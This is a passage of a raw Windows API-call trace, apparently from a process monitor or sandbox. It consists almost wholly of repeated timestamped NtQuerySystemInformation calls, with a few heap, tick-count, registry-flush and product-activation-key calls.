SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x38, ResultLength=0x0) [0264.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb20, Length=0x20, ResultLength=0x0) [0264.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x20, ResultLength=0x0) [0264.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x20, ResultLength=0x0) [0264.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe030, Length=0x20, ResultLength=0x0) [0264.424] GetTickCount () returned 0x118274c [0264.424] GetProcessHeap () returned 0x2026c630000 [0264.424] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d718aa0 [0264.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdde0, Length=0x30, ResultLength=0x0) [0264.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdce0, Length=0x38, ResultLength=0x0) [0264.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdce0, Length=0x38, ResultLength=0x0) [0264.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdce0, Length=0x38, ResultLength=0x0) [0264.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc60, Length=0x30, ResultLength=0x0) [0264.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x38, ResultLength=0x0) [0264.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x30, ResultLength=0x0) [0264.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdce0, Length=0x38, ResultLength=0x0) [0264.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdce0, Length=0x38, ResultLength=0x0) [0264.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc20, Length=0x30, ResultLength=0x0) [0264.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x20, ResultLength=0x0) [0264.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc20, Length=0x30, ResultLength=0x0) [0264.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x30, ResultLength=0x0) [0264.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdce0, Length=0x38, ResultLength=0x0) [0264.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc10, Length=0x30, ResultLength=0x0) [0264.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x18, ResultLength=0x0) [0264.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.559] RegFlushKey (hKey=0x3b4) returned 0x0 [0264.563] NtLockProductActivationKeys (pPrivateVer=0x0, pSafeMode=0x0) returned 0x0 [0264.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdce0, Length=0x38, ResultLength=0x0) [0264.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdce0, Length=0x38, ResultLength=0x0) [0264.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdce0, Length=0x38, ResultLength=0x0) [0264.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc20, Length=0x30, ResultLength=0x0) [0264.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x20, ResultLength=0x0) [0264.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc20, Length=0x30, ResultLength=0x0) [0264.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x30, ResultLength=0x0) [0264.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf50, Length=0x28, ResultLength=0x0) [0264.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf50, Length=0x28, ResultLength=0x0) [0264.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde30, Length=0x58, ResultLength=0x0) [0264.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x38, ResultLength=0x0) [0264.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x28, ResultLength=0x0) [0264.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x28, ResultLength=0x0) [0264.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x28, ResultLength=0x0) [0264.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x28, ResultLength=0x0) [0264.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x28, ResultLength=0x0) [0264.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x38, ResultLength=0x0) [0264.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x38, ResultLength=0x0) [0264.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x28, ResultLength=0x0) [0264.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x28, ResultLength=0x0) [0264.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x38, ResultLength=0x0) [0264.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x38, ResultLength=0x0) [0264.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x20, ResultLength=0x0) [0264.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda40, Length=0x20, ResultLength=0x0) [0264.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda40, Length=0x20, ResultLength=0x0) [0264.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda40, Length=0x20, ResultLength=0x0) [0264.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc90, Length=0x20, ResultLength=0x0) [0264.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x38, ResultLength=0x0) [0264.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb0, Length=0x20, ResultLength=0x0) [0264.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x20, ResultLength=0x0) [0264.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x20, ResultLength=0x0) [0264.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x20, ResultLength=0x0) [0264.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x38, ResultLength=0x0) [0264.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb0, Length=0x20, ResultLength=0x0) [0264.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x20, ResultLength=0x0) [0264.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x20, ResultLength=0x0) [0264.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x20, ResultLength=0x0) [0264.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x38, ResultLength=0x0) [0264.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb0, Length=0x20, ResultLength=0x0) [0264.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb40, Length=0x20, ResultLength=0x0) [0264.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb40, Length=0x20, ResultLength=0x0) [0264.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd60, Length=0x40, ResultLength=0x0) [0264.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x38, ResultLength=0x0) [0264.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x38, ResultLength=0x0) [0264.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x38, ResultLength=0x0) [0264.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.682] NtQuerySystemInformation (SystemInformationClass=0xb9, 